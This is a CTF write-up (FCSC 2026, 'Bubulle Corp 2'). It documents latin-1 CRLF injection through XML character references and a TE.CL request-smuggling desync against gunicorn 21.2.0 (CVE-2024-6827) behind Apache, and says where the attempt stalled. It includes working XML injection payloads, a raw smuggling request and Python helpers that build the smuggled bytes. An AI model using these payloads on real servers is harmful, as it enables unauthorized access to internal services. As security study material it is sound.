web web-server http-request-smuggling te-cl cve-2024-6827 gunicorn apache httpprotocoloptions-unsafe pycurl crlf-injection latin1 xml lxml ssrf reverse-proxy unsolved

Sequel to Bubulle Corp. Same XML find() SSRF, but this time latin-1 CRLF injection through the icon method/body fields lets you craft raw requests to the internal Apache proxy. A Transfer-Encoding\xa0 desync against gunicorn 21.2.0 (CVE-2024-6827) smuggles GET /flag to the backend, but reflecting the second response back through Apache was not solved.

Bubulle Corp 2 — CRLF-in-XML → Apache/gunicorn TE.CL smuggling (partial / unsolved)

CTF: FCSC 2026 · Category: Web (server-side) · Author: Mizu · Status: ⚠️ not fully solved — documents the confirmed primitives and where it stalled.

What's different from part 1

Same three-service setup and the same XML find('.//icon_url') SSRF as Bubulle Corp. The proxy is unchanged:

HttpProtocolOptions Unsafe
AliasMatch "^/.+" "/flag.txt"
<Location "/">
    ProxyPass http://bubulle-corp-internal-backend:5000/ keepalive=Off disablereuse=On
</Location>

The easy AliasMatch path still yields flag_placeholder_1 (a decoy). The real flag (flag_placeholder_2, 70 chars on remote) is only returned by the backend's /flag route:

# internal-backend/app.py
@app.route("/", methods=["POST", "GET"])
def index(): return "Hello World!"
@app.route("/flag")
def flag(): return environ.get("FLAG")

Reaching /flag means the request must arrive at the backend itself. Apache's AliasMatch claims every path other than /, so only / is proxied; GET /flag therefore has to be smuggled past Apache as if it were the body of a request to /. icon.py also added PROTOCOLS/REDIR_PROTOCOLS = HTTP|HTTPS, killing gopher/file SSRF, so the only lever is raw HTTP through the proxy.

Primitive 1 — raw request crafting via latin-1 CRLF in XML

As in Secure Mood Notes, method/body are passed to pycurl after .encode("latin1"), so every code point up to U+00FF becomes a single raw byte (no \xc2 prefix as UTF-8 would add). lxml also decodes numeric character references, so &#13;&#10; becomes a real CRLF inside the value:

ET.fromstring('<x>aaa&#13;&#10;bbb</x>').text   # 'aaa\r\nbbb'
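
The two behaviours above can be checked in isolation. This is a minimal sketch that uses the standard library's xml.etree.ElementTree rather than lxml (an assumption made only to keep it dependency-free; the challenge itself uses lxml), and the extra &#160; reference is added here for illustration:

```python
import xml.etree.ElementTree as ET

# Numeric character references survive parsing as real characters:
# &#13;&#10; -> CR LF, &#160; -> U+00A0 (non-breaking space).
text = ET.fromstring("<x>aaa&#13;&#10;bbb&#160;</x>").text
print(repr(text))

# latin-1 maps each code point <= U+00FF to exactly one byte...
latin1_bytes = text.encode("latin1")
print(latin1_bytes)

# ...whereas UTF-8 would expand U+00A0 into the two bytes C2 A0.
utf8_bytes = text.encode("utf-8")
print(utf8_bytes)
```

The single \xa0 byte is what later allows a header name such as Transfer-Encoding\xa0 to be written on the wire.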

Combined with the nested-icon_url validation bypass, you can inject CRLFs into the request line pycurl sends to the internal proxy — i.e. control a raw request to Apache. Example that reaches flag_placeholder_1 through the proxy via an injected request line:

<settings>
  <body>x<method>POST /working_req HTTP/1.1&#13;&#10;Eat:</method>
        <icon_url>http://bubulle-corp-internal-proxy</icon_url></body>
  <method>GET</method>
  <icon_url>https://example.com</icon_url>
</settings>
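
To see why this payload works, the sketch below parses it and compares a direct-child lookup with the descendant search find('.//...'). It rests on assumptions: the standard library parser stands in for lxml, the direct-child lookups are there only for contrast (how the validator selects its element is not shown in this write-up), and the request line is simulated as "<method> <path> HTTP/1.1" rather than produced by pycurl.

```python
import xml.etree.ElementTree as ET

PAYLOAD = """<settings>
  <body>x<method>POST /working_req HTTP/1.1&#13;&#10;Eat:</method>
        <icon_url>http://bubulle-corp-internal-proxy</icon_url></body>
  <method>GET</method>
  <icon_url>https://example.com</icon_url>
</settings>"""

root = ET.fromstring(PAYLOAD)

# Direct-child lookups see the harmless top-level values.
top_method = root.find("method").text
top_url = root.find("icon_url").text

# A descendant search returns the first match in document order,
# which is the element nested inside <body>.
deep_method = root.find(".//method").text
deep_url = root.find(".//icon_url").text

# Simulated request head (assumed format, not pycurl output).
# The dangling "Eat:" header absorbs the " / HTTP/1.1" appended after the method.
wire = f"{deep_method} / HTTP/1.1\r\nHost: bubulle-corp-internal-proxy\r\n\r\n".encode("latin1")
print(wire.decode("latin1"))
```

The injected first line becomes the real request line for /working_req, and whatever the client appends after the method ends up as the value of the throwaway Eat header.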

Primitive 2 — TE.CL desync against gunicorn (CVE-2024-6827)

gunicorn 21.2.0 does not validate Transfer-Encoding properly and can fall back to Content-Length (CVE-2024-6827, classed as TE.CL smuggling). Apache runs with HttpProtocolOptions Unsafe, so malformed header names slip through. Putting a non-breaking space (\xa0) at the end of the header name desyncs the two parsers: Apache does not recognize the malformed Transfer-Encoding and frames the request by Content-Length, while gunicorn treats the bytes after the terminating 0 chunk as a second pipelined request. This did get GET /flag delivered to the backend:

POST / HTTP/1.1
Host: bubulle-corp-internal-proxy
Connection\xa0: keep-alive
Transfer-Encoding\xa0: chunked
Content-Length: 64

0

GET /flag HTTP/1.1
Host: bubulle-corp-internal-backend
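
The Content-Length value in the request above is not arbitrary: it has to cover the terminating chunk plus the whole smuggled request. A minimal sketch that rebuilds the bytes and compares the two framings (the variable names are illustrative; nothing is sent over the network):

```python
CRLF = b"\r\n"

# The request we want the backend to treat as a second, pipelined request.
smuggled = (
    b"GET /flag HTTP/1.1" + CRLF
    + b"Host: bubulle-corp-internal-backend" + CRLF
    + CRLF
)

# Body as the front end sees it: a zero-length chunk followed by the smuggled request.
terminator = b"0" + CRLF + CRLF
body = terminator + smuggled

headers = [
    b"POST / HTTP/1.1",
    b"Host: bubulle-corp-internal-proxy",
    "Connection\xa0: keep-alive".encode("latin1"),
    "Transfer-Encoding\xa0: chunked".encode("latin1"),
    b"Content-Length: " + str(len(body)).encode("ascii"),
]
request = CRLF.join(headers) + CRLF + CRLF + body

# Content-Length framing consumes the whole body as one request...
cl_framed = body[: len(body)]
# ...while chunked framing stops after the zero-length chunk and leaves the rest.
leftover = body[len(terminator):]

print(len(body))
print(leftover.decode("ascii"))
```

A parser that frames by Content-Length forwards all of it as one POST, while a parser that honours chunked encoding finishes the POST after the 0 chunk and reads the leftover bytes as a new request.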

The backend access log confirmed that both requests reached it:

"POST / HTTP/1.1" 200 12
"GET /flag HTTP/1.1" 200 24      <-- our smuggled request reached the backend

Where it stalled (the unsolved part)

Apache only returned the response to the first request; the smuggled /flag response was consumed but never reflected back. Things that did not work to surface the second response:

  • HEAD / OPTIONS as the outer method (Apache still framed by the backend's Content-Length).
  • HEAD /%2f plus extra pipelined requests to shift response boundaries.
  • Expect: 100-continue games.
  • Note: gunicorn rejects HTTP/0.9, so it always emits a Content-Length, which lets Apache cleanly delimit and drop the extra response. A fake backend that omitted Content-Length proved Apache would then read/return everything — but you can't make the real gunicorn drop it.
  • pycurl opens a fresh connection per fetch, so connection-reuse/queue-poisoning across requests is out.
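
The Content-Length observation in the list above can be illustrated with a toy model. This is only a sketch of response framing, not Apache's actual logic: proxy_read and make_response are hypothetical helpers, and the flag value is a placeholder.

```python
def make_response(body: bytes, with_length: bool = True) -> bytes:
    """Build a minimal HTTP/1.1 response, optionally without Content-Length."""
    head = b"HTTP/1.1 200 OK\r\n"
    if with_length:
        head += b"Content-Length: " + str(len(body)).encode("ascii") + b"\r\n"
    return head + b"\r\n" + body


def proxy_read(stream: bytes) -> bytes:
    """Return the body a toy proxy would relay for the first response in stream."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            # Declared length: relay exactly that many bytes, ignore the rest.
            return rest[: int(value.strip())]
    # No declared length: read until the connection closes.
    return rest


flag = b"FLAG{hypothetical_local_flag}"  # placeholder value

# Real-backend case: both responses carry Content-Length.
clean = make_response(b"Hello World!") + make_response(flag)
relayed_clean = proxy_read(clean)

# Fake-backend case: the first response has no Content-Length.
unframed = make_response(b"Hello World!", with_length=False) + make_response(flag)
relayed_unframed = proxy_read(unframed)

print(relayed_clean)
print(flag in relayed_unframed)
```

In the first case the relayed body ends at the declared length and the second response is dropped; in the second case everything up to connection close is relayed, including the smuggled response.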

The challenge author hinted there was a smuggling technique not yet tried ("read up again on smuggling techniques, there are ideas you haven't had yet", translated from French). The likely missing idea is a different response-desync or framing trick (e.g. an Expect/100-continue or chunked-response angle, in the vein of the "HTTP/1.1 Must Die" research) that makes Apache return the second response. Left unsolved.

Takeaways (generalized technique)

  • latin-1-encoded fields + XML numeric character references (&#13;&#10;) = CRLF injection into an outbound request the server builds (pycurl CUSTOMREQUEST/POSTFIELDS) — request smuggling/SSRF primitive.
  • HttpProtocolOptions Unsafe + a malformed header name (non-breaking space \xa0 in the name) is a reliable Apache↔gunicorn parser desync; gunicorn 21.2.0 is TE.CL-vulnerable (CVE-2024-6827).
  • Getting the smuggled request delivered is only half the battle — reflecting its response back through an intermediary needs a response-framing desync (no Content-Length, oversized Content-Length, or making the proxy skip the first response). When the upstream always sends a clean Content-Length, a naive proxy will swallow the extra response.

Sources & references